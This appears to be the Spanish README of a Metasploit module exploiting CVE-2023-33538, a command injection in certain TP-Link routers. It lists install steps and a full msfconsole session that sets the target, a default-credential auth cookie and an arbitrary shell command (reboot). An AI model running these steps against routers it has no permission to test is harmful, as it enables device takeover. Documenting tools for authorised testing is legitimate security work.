
CVE-2023-33538 - Módulo Ruby de Inyección de Comandos en TP-Link para Metasploit Framework
Este módulo auxiliar de Metasploit apunta a una vulnerabilidad de inyección de comandos autenticada en los routers TP-Link TL-WR940N V2/V4 y TL-WR841N V8/V10.
El problema radica en el parámetro vulnerable ssid1 utilizado en WlanNetworkRpm.htm, que permite la inyección de comandos arbitrarios de shell.
Si tiene éxito, permite al atacante ejecutar comandos arbitrarios en el dispositivo.
Más información sobre el CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb en tu carpeta de módulos de Metasploit, por ejemplo:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
El módulo no realiza la autenticación. Debes extraer manualmente la cookie
Authorizationy el prefijo de sesión de un inicio de sesión exitoso en la interfaz web del router.
Este módulo está destinado únicamente con fines educativos.
No utilices este código contra dispositivos o infraestructuras que no poseas o para los que no tengas permiso explícito de prueba.
Si encuentras errores o tienes ideas para mejoras, no dudes en abrir un issue o dejar un comentario.